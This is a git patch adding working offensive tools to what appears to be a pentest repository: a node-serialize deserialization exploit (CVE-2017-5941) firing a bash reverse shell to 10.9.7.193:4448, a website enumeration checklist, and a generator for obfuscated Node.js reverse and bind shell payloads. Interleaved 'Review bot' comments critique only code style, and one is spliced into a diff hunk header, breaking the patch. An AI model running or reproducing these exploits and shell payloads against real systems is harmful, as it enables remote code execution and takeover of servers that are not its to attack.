From cbfc4137ba17db994b16691f34c0fab026a27907 Mon Sep 17 00:00:00 2001
From: whx
Date: Mon, 11 Oct 2021 00:20:03 +0200
Subject: [PATCH] bump

---
 49552.py | 47 +++++++++++++
 enumeration/docs/websites.md | 12 ++++
 reverse_shells/node_shell.py | 129 +++++++++++++++++++++++++++++++++++
 3 files changed, 188 insertions(+)
 create mode 100644 49552.py
 create mode 100644 enumeration/docs/websites.md
 create mode 100644 reverse_shells/node_shell.py

diff --git a/49552.py b/49552.py
new file mode 100644
index 0000000..a3a1701
--- /dev/null
+++ b/49552.py
@@ -0,0 +1,47 @@
+# Exploit Title: Node.JS - 'node-serialize' Remote Code Execution (2)
+# Exploit Author: UndeadLarva
+# Software Link: https://www.npmjs.com/package/node-serialize
+# Version: 0.0.4
+# CVE: CVE-2017-5941
+
+import requests
+import re
+import base64
+import sys
+
+url = 'http://10.10.216.3/' # change this
+
+payload = ("require('http').ServerResponse.prototype.end = (function (end) {"
+"return function () {"
+"['close', 'connect', 'data', 'drain', 'end', 'error', 'lookup', 'timeout', ''].forEach(this.socket.removeAllListeners.bind(this.socket));"
+"console.log('still inside');"
+"const { exec } = require('child_process');"
+"exec('bash -i >& /dev/tcp/10.9.7.193/4448 0>&1');" # change this
+"}"
+"})(require('http').ServerResponse.prototype.end)")
+
+# rce = "_$$ND_FUNC$$_process.exit(0)"
+#code ="_$$ND_FUNC$$_console.log('behind you')"
+#code = "_$$ND_FUNC$$_" + "function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });}"
+#code = "_$$ND_FUNC$$_" + payload
+
+code = "_$$ND_FUNC$$_console.log(1)()"
+#code = "_$$ND_FUNC$$_require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });()"
+#string = '{"username":"TheUndead","country":"worldwide","city":"Tyr", "exec": "'+code+'"}'
+#code = "return function(){exec('bash -i >& /dev/tcp/10.9.7.193/4448 0>&1')}();" # change this
+code = "return function(){exec('bash -i >& /dev/tcp/10.9.7.193/4448 0>&1')}();"
+string = '{"email": "'+code+'"}'
+
+print code
+
+cookie = {'session':base64.b64encode(string)}
+
+response = requests.post(url+"?email="+code).text
+print response
+
+#try:
+# response = requests.get(url, cookies=cookie).text
+# print response
+#except requests.exceptions.RequestException as e:
+# print('Oops!')
+# sys.exit(1)
diff --git a/enumeration/docs/websites.md b/enumeration/docs/websites.md
new file mode 100644
index 0000000..0e70131
--- /dev/null
+++ b/enumeration/docs/websites.md
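Review bot: `payload` (the multi-line string beginning `payload = ("require('http')...`) and `cookie` are assigned but never used, because `code` is reassigned twice and the only request issued is `response = requests.post(url+"?email="+code).text`, with the cookie-based request left commented out at the bottom. The header still describes the original node-serialize entry for CVE-2017-5941, so it no longer documents what this script actually does; a note such as `# Modified from the original: only the query-string request below is live, the payload/cookie code is kept for reference` would stop readers from trusting the header over the code. `re` and `sys` are imported but unused, and `print code` / `print response` are Python 2 print statements, which the file should state up front since nothing else hints at the interpreter it expects. The hunk is the whole file at module level, so there is no enclosing function.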
@@ -0,0 +1,12 @@
+# Website Enumeration
+
+* `robots.txt`
+* [Favicon](https://wiki.owasp.org/index.php/OWASP_favicon_database), `curl` target and `md5sum`
+* `sitemap.xml`
+* Headers, `curl ` including `-I` or `-v` parameters
+* Check Components of the website, like blog frameworks, shops.
+* User Wappalyzer
+* Snapshots of the site via waybackmachine
+* Check repos of the site
+* Check buckets
+* Fuzz
diff --git a/reverse_shells/node_shell.py b/reverse_shells/node_shell.py
new file mode 100644
index 0000000..8309a38
--- /dev/null
+++ b/reverse_shells/node_shell.py
@@ -0,0 +1,129 @@
+#!/usr/bin/python
+# Author: Hd7exploit
+# hd7exploit.wordpress.com
+# Based on https://github.com/evilpacket/node-shells/blob/master/node_revshell.js
+import getopt, sys
+
+def usage():
+ print '''
+Usage: %s
+
+Help:
+ -c : Run some linux commands (ls,cat...)
+ -r : Get payload reverse shell
+ -b : Get payload bind shell
+ -h : IP address in case of reverse shell
+ -p : Port
+ -e : Encode shell
+ -o : Create a object contain payload with Immediately invoked function expression (IIFE)
+ ''' % (sys.argv[0])
+
+try:
+ opts, args = getopt.getopt(sys.argv[1:], "c:h:rbp:eo", ["help"])
+ if not opts:
+ usage()
+ sys.exit()
+except getopt.GetoptError:
+ usage()
+ sys.exit(2)
+
+type = host = port = command = ""
+encode = False
+object = False
+for o, a in opts:
+ if o == "-r":
+ type = 'REVERSE'
+ if o == "-b":
+ type = 'BIND'
+ if o == "-h":
+ host = a
+ if o == "-o":
+ object = True
+ if o == "-p":
+ port = a
+ if o == "-c":
+ type = 'COMMAND'
+ command = a
+ if o == "-e":
+ encode = True
+ if o == "--help":
+ usage()
+ sys.exit()
+
+def get_reverse_shell():
+ return '''
+ var net = require('net');
+ var spawn = require('child_process').spawn;
+ HOST="%s";
+ PORT="%s";
+ TIMEOUT="5000";
+ if (typeof String.prototype.contains === 'undefined') { String.prototype.contains = function(it) { return this.indexOf(it) != -1; }; }
+ function c(HOST,PORT) {
+ var client = new net.Socket();
+ client.connect(PORT, HOST, function() {
+ var sh = spawn('/bin/sh',[]);
+ client.write("Connected!\\n");
+ client.pipe(sh.stdin);
+ sh.stdout.pipe(client);
+ sh.stderr.pipe(client);
+ sh.on('exit',function(code,signal){
+ client.end("Disconnected!\\n");
+ });
+ });
+ client.on('error', function(e) {
+ setTimeout(c(HOST,PORT), TIMEOUT);
+ });
+ }
+ c(HOST,PORT);
+ ''' % (host, port)
+
+def get_bind_shell():
+ return '''
+ var net = require('net');
+ var spawn = require('child_process').spawn;
+ PORT="%s";
+ if (typeof String.prototype.contains === 'undefined') { String.prototype.contains = function(it) { return this.indexOf(it) != -1; }; }
+ var server = net.createServer(function (c) {
+ var sh = spawn('/bin/sh', ['-i']);
+ c.pipe(sh.stdin);
+ sh.stdout.pipe(c);
+ sh.stderr.pipe(c);
+ });
+ server.listen(PORT);
+ ''' % (port)
+
+
+def get_command(command):
+ return '''
+ require('child_process').exec('%s', function(error, stdout, stderr) {
+ console.log(error)
+ console.log(stdout)
+ })
+ ''' % (command)
+
+def encode_string(string):
+ string_encoded = ''
+ for char in string:
+ string_encoded += "," + str(ord(char))
+ return string_encoded[1:]
+
+payload = ""
+if type == 'BIND':
+ payload = get_bind_shell()
+elif type == 'REVERSE':
+ payload = get_reverse_shell()
+else:
+ payload = get_command(command);
+
+if encode:
+ payload = encode_string(payload)
+
+if object:
+ payload = '''
+ {"run": "_$$ND_FUNC$$_function (){eval(String.fromCharCode(%s))}()"}
+ ''' % (payload)
+
+print '''
+ =======> Happy hacking <======
+'''
+print payload
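Review bot: `type = host = port = command = ""` and `object = False` rebind two builtins at module level for the rest of the script, the kind of shadowing that breaks the moment someone adds a `type(x)` or `isinstance(x, object)` check further down; `mode` and `as_object` carry the same meaning without the collision. The option loop is a run of independent `if o == ...` tests where `elif` would state that exactly one branch applies per option, and `payload = get_command(command);` carries a stray semicolon. `encode_string` grows its result with `+=` in a loop and then slices off the leading comma, which is the one-liner `return ",".join(str(ord(c)) for c in string)`. `usage()` documents `-h : IP address in case of reverse shell` while `--help` is the help flag, and because `-h` conventionally means help the usage text should say explicitly that help is `--help` only.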